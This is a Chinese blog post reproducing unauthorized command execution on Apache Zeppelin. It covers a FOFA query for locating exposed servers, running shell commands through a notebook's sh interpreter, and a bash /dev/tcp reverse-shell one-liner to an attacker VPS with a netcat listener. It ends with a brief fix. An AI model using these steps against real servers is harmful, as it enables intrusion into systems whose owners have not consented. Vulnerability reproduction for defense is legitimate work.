Zeppelin未授权访问getshell

最新推荐文章于 2024-04-15 18:03:34 发布
最新推荐文章于 2024-04-15 18:03:34 发布
阅读量4.2k 收藏
点赞数
分类专栏: 渗透 复现 文章标签: 渗透测试 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34341458/article/details/123901843
版权

0x01 漏洞简介

Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。

Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等

0x02 影响范围

fofa语句:title=“Zeppelin”
需要有登录的用户为:anonymouse

0x03 漏洞复现

  1. 访问URL,首页的样子:
    在这里插入图片描述
    进入首页后,需要有已登录的用户: anonymous,其他的不可以。在这里插入图片描述
  2. 点击Create new note
    在这里插入图片描述
    在弹出的对话框中将Default Interpreter选择为sh:
    在这里插入图片描述
  3. 然后就可以输入一些命令进行执行了
    在这里插入图片描述
    在这里插入图片描述
  4. 反弹shell
    这里先设置vps监听端口,然后在命令输入框中输入bash命令进行上线操作。

  • vps中输入:nc -lvp 2345
    在这里插入图片描述

  • 在命令框中输入命令:

bash -i &>/dev/tcp/vps ip/端口号 <&1

在这里插入图片描述

  • 这时vps上有会话进行连接,成功反弹shell。
    在这里插入图片描述

0x04 修复建议

禁止未授权的匿名账户进行访问

参考:https://www.freebuf.com/vuls/306431.html

Redamancy——
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Zeppelin 授权任意命令执行.md
04-12
Apache Zeppelin 授权任意命令执行
zeppelin 授权任意命令执行漏洞复现
最新发布
YJ_12340的博客
06-06 875
查看 /etc/passwd,主要注意root和abc两个用户,其中root用户中间的两个数字为 0:0,第一个0(UID)代表root用户,第二个0(GID)代表root组,abc用户的为 1000:1000,同样的,分别代表abc用户和abc组。我们使用sh弹回来的shell进行下一步操作,创建一个特权用户,拿下对目标的持续控制,因为弹回来的是root权限,所以我们可以很方便的操作,但如果是普通用户,我们可以尝试是否拥有sudo权限,如果没有那就得另觅它法了。,如图所示,开启了监听。
Zeppelin的入门使用系列之使用Zeppelin运行shell命令(二)
weixin_33739523的博客
09-02 1000
        不多说,直接上干货!         前期博客 Zeppelin的入门使用系列之创建新的Notebook(一)       接下来,我将以ml-100k数据集,示范如何使用Spark SQL进行数据分析与数据可视化           因为   [hadoop@master zeppelin]$ pwd /home/hadoop/data/...
zeppelin权限问题
anzhuangguai的专栏
04-21 2077
OS: hdp2.5 现象:重起后齐柏林不工作 查看日志是因为没/var/run权限 修改方法 mkdir -p /var/run/zeppelin chown zeppelin:zeppelin /var/run/zeppelin https://community.hortonworks.com/questions/44451/zeppelin-s
zeppelin&说明书.rar
09-17
5. **防火墙设置**:如果系统有防火墙,记得开放Zeppelin默认的端口(通常是8080)以允许外部访问。 **三、使用Zeppelin** 1. **访问Web界面**:启动成功后,通过浏览器访问`http://your_server_ip:8080`,输入默认...
虚拟机zeppelin安装
10-18
启动成功后,你可以在浏览器中输入虚拟机的IP地址加上默认端口8080(例如:http://your_vm_ip:8080)来访问Zeppelin的Web界面。首次登录时,你可能需要创建一个管理员用户。 最后,我们可以创建新的笔记,导入数据...
zeppelin-cloudera:适用于Cloudera Manager的Apache Zeppelin包裹和CSD
05-18
适用于Cloudera的Apache Zeppelin包裹和CSD 此git存储库用于构建CDH的CSD和宗地。 Zeppelin将在Cloudera Manager中作为服务运行,并且其配置通过CM Web UI进行维护。 CSD只有python interpeter。 使用的是齐柏林...
Zeppelin架构原理分析
02-24
首先上一张官方给出的Zeppelin整体架构图ApacheZeppelin的架构比较简单直观,总共分为3层:1.Zeppelin前端2.ZeppelinServer3.ZeppelinInterpreterZeppelin前端是基于AngularJS(目前社区正在升级改造前端,但是对...
python 入侵服务器_【漏洞预警】Zeppelin安装配置不当可导致服务器被入侵
weixin_39867509的博客
12-16 240
本帖最后由 唯品会SRC 于 2017-8-3 16:07 编辑Zeppelin安装配置不当可导致服务器被入侵关于Zeppelin问题出在哪Zeppelin后台执行操作系统命令其他总结关于Zeppelin“Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的开源框架。Zeppelin提供了数据分析、数据可视化等功能。Zeppelin 是一个提供交互数据分析且基于Web的笔记本。...
zeppelin-0.8.1-bin-all.tgz
07-10
zeppelin-0.8.1-bin-all.tgz
Apache Zeppelin 命令执行漏洞复现(CVE-2024-31861)
0xSec
04-15 1447
Apache Zeppelin 中代码生成控制不当(“代码注入”)漏洞。攻击者可以使用 Shell解释器作为代码生成网关,系统org.apache.zeppelin.shell.ShellInterpreter类直接调用/sh来执行命令,没有进行过滤,导致RCE漏洞
Zimbra xxe+ssrf导致getshell
一个安全研究员
03-26 6281
我分析的第一个java漏洞
Firefox 内存破坏漏洞
OSCS开源安全社区
08-25 285
在Firefox 103、Firefox ESR 102.1 和 Firefox ESR 91.12 中存在内存安全漏洞,其中一些错误回显包含敏感信息,攻击者可利用此漏洞执行任意代码。升级Firefox到104、Firefox ESR到102.2、Firefox ESR到91.13 或更高版本。Firefox 是一款网络浏览器。
azkaban与zeppelinshell脚本调度任务
qq_40537039的博客
11-19 1199
Shell脚本 编写Shell脚本实现Azkaban利用用户名、密码、noteID等来调用Zeppelin的代码。 #!/bin/bash #设置参数默认值 zeppelin_server_addr=192.168.128.200 port=8089 # 登录到zeppelin服务器,并且保存本次会话的cookie信息 curl -X ...
中间件安全—Apache常见漏洞
剁椒鱼头没剁椒的博客
02-20 7332
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。apache httpd支持一个文件多个后缀,windows对于多后缀的识别是看最后一个“.”之后的后缀名。apache对于多后缀文件的识别是从后往前识别,最后一个后缀不能被识别时,会往前识别。
【高危】Apache Spark UI shell 命令注入漏洞(POC)
murphysec的博客
05-16 943
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。该漏洞是针对此前CVE-2022-33891漏洞的修订,原有漏洞通告中认为3.1.3版本已修复该漏洞,后发现仍受到影响,3.1.3版本已不再维护,官方建议升级至3.4.0版本。该漏洞已存在 POC。
Apache Zookeeper 授权访问漏洞【原理扫描】
热门推荐
萌兔兔MMQ!!
11-25 1万+
漏洞名称 Apache Zookeeper 授权访问漏洞【原理扫描】风险等级 高高可利用 否CVE编号 -端口(服务) 2181(zookeeper)风险描述 ZooKeeper是一个高性能的分布式数据一致性解决方案,它将复杂的,容易出错的分布式一致性服务封装起来,构成一个高效可靠的原语集,并提供一系列简单易用的接口给客户使用。ZooKeeper默认开启在2181端口,在进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
HDP指南:Apache Zeppelin组件详解
Apache Zeppelin Component Guide是Hortonworks Data Platform的重要组成部分,该文档于2018年5月17日发布。Hortonworks Data Platform是一款基于Apache Hadoop的开源大数据平台,旨在处理和分析海量数据,其设计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值